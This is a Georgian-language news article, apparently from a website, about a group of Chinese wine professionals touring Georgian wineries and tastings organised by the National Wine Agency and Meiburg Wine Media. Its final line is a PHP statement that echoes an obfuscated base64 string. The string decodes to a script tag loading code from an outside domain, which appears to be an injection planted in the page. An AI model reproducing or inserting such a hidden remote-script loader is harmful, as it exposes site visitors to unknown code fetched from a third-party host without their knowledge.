celsiusi
ავერსი შნაიდერი

 ღვინის ეროვნული სააგენტოს მხარდაჭერით და სააგენტოს კონტრაქტორი მარკეტინგული კომპანიის Meiburg Wine Media ორგანიზებით, საქართველოს ჩინეთის სახალხო რესპუბლიკიდან ღვინის პროფესიონალების 14 კაციანი ჯგუფი სტუმრობდა.

ღვინის ეროვნული სააგენტოს ინფორმაციით, ტურის ფარგლებში, ჯგუფის წევრებმა, რომლის შემადგენლობაში სომელიეები და იმპორტიორები შედიოდნენ, ქართლსა და კახეთში ღვინის საწარმოები დაათვალიერეს, დააგემოვნეს სხვადასხვა სტილის ქართული ღვინო.

ინფორმაციის თანახმად, თბილისში სტუმრებისთვის სპეციალური დეგუსტაცია (Walkaround Tasting) გაიმართა, სადაც ქართული ღვინის მწარმოებელი 15 კომპანიის ღვინოების იყო წარმოდგენილი. ღვინის ეროვნული სააგენტოს მარკეტინგისა და საზოგადოებასთან ურთიერთობის დეპარტამენტის წარმომადგენელმა ირაკლი ჩოლობარგიამ სტუმრებს ქართული ღვინის ისტორიის, თანამედროვე ინდუსტრიის, ქართული ვაზისა და ღვინის ჯიშების მრავალფეროვნების შესახებ პრეზენტაცია წარუდგინა.

„ვფიქრობ, რომ ქართულ ღვინოს აქვს დიდი მომავალი და პოტენციალი. ქართული ღვინო უნიკალურია, იმიტომ, რომ თქვენ გაქვთ ღვინის დაყენებისა და წარმოების განსაკუთრებული ტრადიცია, როგორიც არის ქვევრის ქარვისფერი ღვინის დაყენების განსხვავებული მეთოდი. ეს არის უნიკალური მემკვიდრეობა არა მარტო საქართველოსთვის, არამედ მთელი მსოფლიოსათვის“, - აღნიშნა ჯგუფის წევრმა, დორიან ტანგმა.

მათივე ცნობით, დორიან ტანგი ერთ-ერთია Meiburg Wine Media-ის მიერ „ქართული ღვინის საგანმანათლებლო პროგრამის“ ფარგლებში მომზადებული ხუთ ღვინის პროფესიონალს შორის, რომლებიც, 2022 წლიდან, ქართული ღვინის პოპულარიზაციის მიზნით, აზიის ქვეყნებში სემინარებსა და საგანმანათლებლო ღონისძიებებს ატარებენ.

აღსანიშნავია, რომ ჩინეთი ქართული ღვინის ერთ-ერთი გამოკვეთილი სტრატეგიული ბაზარია, სადაც ქართული ღვინის ცნობადობისა და ექსპორტის გაზრდის მიზნით, 2013 წლიდან აქტიურად მიმდინარეობს მარკეტინგული კამპანია. ღვინის ეროვნული სააგენტო, ქართული ღვინის მარკეტინგული კამპანიის განსახორციელებლად, ჩინეთის ბაზარზე მარკეტინგულ კომპანიასთან Meiburg Wine Media და ღვინის მაგისტრ ქესიდი დარტთან თანამშრომლობს.

201
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");